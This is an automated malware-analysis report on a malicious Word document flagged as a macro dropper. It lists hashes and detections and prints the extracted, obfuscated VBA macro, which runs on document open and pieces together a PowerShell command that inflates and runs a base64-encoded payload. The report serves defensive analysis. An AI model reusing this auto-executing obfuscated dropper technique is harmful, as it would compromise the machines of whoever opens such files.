Office (OLE) malware analysis — malicious · b72da9c86e4496c5

MALICIOUS

Office (OLE)

257.8 KB Created: 2018-07-10 07:40:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 17bea7c5ba175d247da298ef4e9c79e2 SHA-1: 96ac7506c3b82e8ee8ecfece7408f3b9162cb991 SHA-256: b72da9c86e4496c51fc622ddd5d45c4e390aa8272be4ff0b7ba7590ba2f673d3

222 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Agent-6606216-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6606216-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18607 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18607 bytes
SHA-256: `e26fd7831bde5b7e7f634274ef707ac6594bab73ff88c5d232bee45b688fcf30`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DMbiYMwIYaSCuq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next CEzfiW = (CUqmLj / AGFJAv * (27130 - 45351 * 57145 * SKQhR / (WRTaH * PtRlK))) EhirL = (nQVVoU / abMUFA * (72278 - 21012 * 39421 * rIbsq / (sOlrC * pkSFF))) CdbBm = (CAuHST / LCzLC * (60722 - 90754 * 66705 * Gsocti / (WjoXq * cAfBEv))) drQof = (kYuYhX / XiNJiT * (58757 - 47068 * 51473 * whjZwf / (aADLc * YoOCl))) QpSAFR = (sWbBr / OUGvG * (73299 - 86271 * 89604 * hUPuhp / (UQtao * GPiUj))) HzHCrSzJ ("" + wfGchoj + KlJkMrjjjwE + ZLwbPHlqJ + TrtLPM + wOLrw + YCUamDh + zErSIzlLkdWBKH) BOrNm = (fmtJS / UulnBV * (88225 - 42314 * 94711 * zRzIwk / (CNuEMl * qFItZF))) fqrpri = (pOuQG / ZQiJv * (1646 - 82775 * 91963 * pIIwz / (MAwsVz * GRGsCC))) End Sub Attribute VB_Name = "KvfYQpikdEh" Function ZLwbPHlqJ() On Error Resume Next jaDjkO = (95981 - ftwdZz * (55404 * 4899)) HXLXzJ = (61739 - RcAfZ * (33308 * 92102)) zbjfNsVTmUt = "p" + rUVqcWRfLpqi + PhfBrWJ + "owe" + SPhdrcXcsbLGP + aMTjmuoLcYKR + "r" + pTbdjCa + ZCoMzGKzATuai + "sh" + atiDEEhLZbD + djLJiTujwhqE + "e" + JwDaLQACmYX + srOkuwaUQIkwL + "ll" + cMnwndXMWBrsj + mmniCpjzwGrGsq + " ( " + AHHaalYDLUi + CGquTVwIjGDs + "n" + swXiWDXrkcAXB + ShLrOtAALZUU + "Ew" + ADhLvjGopH + LVOuwUkX + "-Ob" + sBAwrvLFBi + kYSLFhdisD + "J" + ifmRcAk + bKjLwoL + "E" + FGKnlpblOCtj + zzNMJtcBwCSIO + "Ct" + HsSBIzvrvuwprm + WuVjOkc + " " + HEIIVcbplGKa + rEFRRMDlPQ + " sY" + NsFlWPRRAtmjaR + GfXinWd + "st" + TLojVprK + ikzkuJRXw + "em" + rzqDfjtTHr + dDEckfDvYBD + ".i" GucUW = fLlcLw * qFzrRW + HWhph / 62087 / 85848 * WzpwCm RwltjS = btdHow * jjjUJj + mnqFl / 78667 / 76638 * OvqRQj dkpiFw = YEvYR * Qidpb + LunzdD / 78698 / 58958 * RWiRnD Vpblkz = "o" + EHpjRBpQWj + McoBhlpmL + ".ST" + SVHhNGdCM + kTobcmIM + "rEa" + jVEutPFR + IdrXOKTcJsilPD + "M" + NGICdzuIlz + UrYkwzAHcQMSS + "ReA" + oiuFBDX + ILUIjimOIjISUt + "deR" + Cktwuqjzw + ruBkwoZbmis + "( (" + izJmXkTkHpwSiG + bWMdEuUGw + "n" + vSAlKMzRwjz + ltkECRRi + "E" LHfup = 69444 * CqMGYS / 12833 - oGfoI * iwzrKK * Eiuva nCIJHTzCD = "w-" + iRJhTdGNGMb + OKmtLYj + "ObJ" + CfZNwLRKwJR + oVGpHYjt + "E" + jOqTIBOkISwP + FfuvvORM + "Ct" + WQnWRIc + wtwIsJJjZI + " " + Zrzjbdnw + UolzrOrSA + "sYs" + shOHWCmm + DStzYnnpfonGf + "TeM" + XuRurGIR + KlcFaBMlZQWs + "." + aEdUBYlCow + UrnluAuQ + "i" + LkEnbVG + itwUndnQavHwf + "O." + hVwnWVwkF + tQNwPwjHUOVWz + "c" + jTUGGfil + XSmSjJtw + "o" + XCifLQYkELww + miPwRNOfH + "m" + itooFcaFYjjpo + HthvIZmXjBtuf + "Pr" + svonhWjvzj + GjFpbDaGUwMhS + "es" + InLiuYDqlA + TYzhMkhjq + "s" + SqEazujH + AaInBdTDpUpap + "IOn" XQzzlK = jbtrpw / wBtfY / zptKG / cBHWr - 3195 + scdjJj - UthuJn + zsSvu + nkiWp + XiiZFB GaSRjv = zDHzBT / dJoazk / HuHuT / wqUct - 39311 + OYZALz - ohaXn + iFUki + FizfL + PjvIi ivQWYYOmqDO = ".DE" + YiEjoOzMVZUj + hrVjzoPMOtOdwP + "fla" + wuRHwzBlwPG + aLbQTCEnz + "t" + RLQKVKSij + aSzzhqkmiiW + "es" + hmNcNYszMAqmj + mwYJWzkJQ + "trE" + NCMziuMbci + ULwaNSJKzAUAl + "A" + cozdwGsKp + RvaHNjpGD + "M(" + ZXqHKWNiLN + knfFAjbAJmzA + " [" + qnnLfGPDPZmo + zGcztNqUhb + "syS" + bzPmXqtajZ + iRSjXGSMnFDCKA + "tem" + uVFMXIi + dBwvVpXLcRbuJ + ".IO" + IckWuNbXjsj + icamAstEWQ + ".ME" + fqiifGkYf + YIXaBiNCpdEdzr + "m" + QDVmLSFPWtpDmv + fhCidSraJOcma + "Or" + qqMTUJQkFCID + JQtqPzSpKQwLv + "yS" + qToJKwNZcSfOzw + OjlAzjvLPQ + "TRe" + wUJOnnOjUuz + rQYkjUsjvkbJdw + "aM" + cuuzidHJQb + rAUlvEGSXajv + "] " AkhEKo = 14564 * rADtN + 27025 * OTHKL / vQqOYs - zCNwpm - XcMRVa / ITiCrs * 16737 * GYlzE - Trqlw / MpmFE + 52222 + mmHqpl BiQLGAa = "[C" + HLhzjqvoNshXDl + ZHTTjdzQGWW + "O" + vLsSXjiEwlVt + MtOjAmKQdrTPi + "nv" + sKUwGRjoF + qbcWwZi + "erT" + WsnVNXfiBwHE + DbBzrajFJDwvj + "]:" + ttjtcuAW + ilznGYzZnYuz + ":f" + JFRjkWRnrbHEa + tDECOIpiRCiBW + "roM" + MwRpjWcRm + vtVfBzmku + "bA" + uNiUXzjFVvrdP + laSQmSbzNvNl + " ... (truncated)

SHA-256: e26fd7831bde5b7e7f634274ef707ac6594bab73ff88c5d232bee45b688fcf30

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DMbiYMwIYaSCuq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   CEzfiW = (CUqmLj / AGFJAv * (27130 - 45351 * 57145 * SKQhR / (WRTaH * PtRlK)))
   EhirL = (nQVVoU / abMUFA * (72278 - 21012 * 39421 * rIbsq / (sOlrC * pkSFF)))
   CdbBm = (CAuHST / LCzLC * (60722 - 90754 * 66705 * Gsocti / (WjoXq * cAfBEv)))
   drQof = (kYuYhX / XiNJiT * (58757 - 47068 * 51473 * whjZwf / (aADLc * YoOCl)))
   QpSAFR = (sWbBr / OUGvG * (73299 - 86271 * 89604 * hUPuhp / (UQtao * GPiUj)))
HzHCrSzJ ("" + wfGchoj + KlJkMrjjjwE + ZLwbPHlqJ + TrtLPM + wOLrw + YCUamDh + zErSIzlLkdWBKH)
   BOrNm = (fmtJS / UulnBV * (88225 - 42314 * 94711 * zRzIwk / (CNuEMl * qFItZF)))
   fqrpri = (pOuQG / ZQiJv * (1646 - 82775 * 91963 * pIIwz / (MAwsVz * GRGsCC)))
End Sub


Attribute VB_Name = "KvfYQpikdEh"
Function ZLwbPHlqJ()
On Error Resume Next
jaDjkO = (95981 - ftwdZz * (55404 * 4899))
   HXLXzJ = (61739 - RcAfZ * (33308 * 92102))
zbjfNsVTmUt = "p" + rUVqcWRfLpqi + PhfBrWJ + "owe" + SPhdrcXcsbLGP + aMTjmuoLcYKR + "r" + pTbdjCa + ZCoMzGKzATuai + "sh" + atiDEEhLZbD + djLJiTujwhqE + "e" + JwDaLQACmYX + srOkuwaUQIkwL + "ll" + cMnwndXMWBrsj + mmniCpjzwGrGsq + " ( " + AHHaalYDLUi + CGquTVwIjGDs + "n" + swXiWDXrkcAXB + ShLrOtAALZUU + "Ew" + ADhLvjGopH + LVOuwUkX + "-Ob" + sBAwrvLFBi + kYSLFhdisD + "J" + ifmRcAk + bKjLwoL + "E" + FGKnlpblOCtj + zzNMJtcBwCSIO + "Ct" + HsSBIzvrvuwprm + WuVjOkc + " " + HEIIVcbplGKa + rEFRRMDlPQ + " sY" + NsFlWPRRAtmjaR + GfXinWd + "st" + TLojVprK + ikzkuJRXw + "em" + rzqDfjtTHr + dDEckfDvYBD + ".i"
GucUW = fLlcLw * qFzrRW + HWhph / 62087 / 85848 * WzpwCm
   RwltjS = btdHow * jjjUJj + mnqFl / 78667 / 76638 * OvqRQj
   dkpiFw = YEvYR * Qidpb + LunzdD / 78698 / 58958 * RWiRnD
Vpblkz = "o" + EHpjRBpQWj + McoBhlpmL + ".ST" + SVHhNGdCM + kTobcmIM + "rEa" + jVEutPFR + IdrXOKTcJsilPD + "M" + NGICdzuIlz + UrYkwzAHcQMSS + "ReA" + oiuFBDX + ILUIjimOIjISUt + "deR" + Cktwuqjzw + ruBkwoZbmis + "( (" + izJmXkTkHpwSiG + bWMdEuUGw + "n" + vSAlKMzRwjz + ltkECRRi + "E"
LHfup = 69444 * CqMGYS / 12833 - oGfoI * iwzrKK * Eiuva
nCIJHTzCD = "w-" + iRJhTdGNGMb + OKmtLYj + "ObJ" + CfZNwLRKwJR + oVGpHYjt + "E" + jOqTIBOkISwP + FfuvvORM + "Ct" + WQnWRIc + wtwIsJJjZI + "  " + Zrzjbdnw + UolzrOrSA + "sYs" + shOHWCmm + DStzYnnpfonGf + "TeM" + XuRurGIR + KlcFaBMlZQWs + "." + aEdUBYlCow + UrnluAuQ + "i" + LkEnbVG + itwUndnQavHwf + "O." + hVwnWVwkF + tQNwPwjHUOVWz + "c" + jTUGGfil + XSmSjJtw + "o" + XCifLQYkELww + miPwRNOfH + "m" + itooFcaFYjjpo + HthvIZmXjBtuf + "Pr" + svonhWjvzj + GjFpbDaGUwMhS + "es" + InLiuYDqlA + TYzhMkhjq + "s" + SqEazujH + AaInBdTDpUpap + "IOn"
XQzzlK = jbtrpw / wBtfY / zptKG / cBHWr - 3195 + scdjJj - UthuJn + zsSvu + nkiWp + XiiZFB
   GaSRjv = zDHzBT / dJoazk / HuHuT / wqUct - 39311 + OYZALz - ohaXn + iFUki + FizfL + PjvIi
ivQWYYOmqDO = ".DE" + YiEjoOzMVZUj + hrVjzoPMOtOdwP + "fla" + wuRHwzBlwPG + aLbQTCEnz + "t" + RLQKVKSij + aSzzhqkmiiW + "es" + hmNcNYszMAqmj + mwYJWzkJQ + "trE" + NCMziuMbci + ULwaNSJKzAUAl + "A" + cozdwGsKp + RvaHNjpGD + "M(" + ZXqHKWNiLN + knfFAjbAJmzA + " [" + qnnLfGPDPZmo + zGcztNqUhb + "syS" + bzPmXqtajZ + iRSjXGSMnFDCKA + "tem" + uVFMXIi + dBwvVpXLcRbuJ + ".IO" + IckWuNbXjsj + icamAstEWQ + ".ME" + fqiifGkYf + YIXaBiNCpdEdzr + "m" + QDVmLSFPWtpDmv + fhCidSraJOcma + "Or" + qqMTUJQkFCID + JQtqPzSpKQwLv + "yS" + qToJKwNZcSfOzw + OjlAzjvLPQ + "TRe" + wUJOnnOjUuz + rQYkjUsjvkbJdw + "aM" + cuuzidHJQb + rAUlvEGSXajv + "] "
AkhEKo = 14564 * rADtN + 27025 * OTHKL / vQqOYs - zCNwpm - XcMRVa / ITiCrs * 16737 * GYlzE - Trqlw / MpmFE + 52222 + mmHqpl
BiQLGAa = "[C" + HLhzjqvoNshXDl + ZHTTjdzQGWW + "O" + vLsSXjiEwlVt + MtOjAmKQdrTPi + "nv" + sKUwGRjoF + qbcWwZi + "erT" + WsnVNXfiBwHE + DbBzrajFJDwvj + "]:" + ttjtcuAW + ilznGYzZnYuz + ":f" + JFRjkWRnrbHEa + tDECOIpiRCiBW + "roM" + MwRpjWcRm + vtVfBzmku + "bA" + uNiUXzjFVvrdP + laSQmSbzNvNl + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.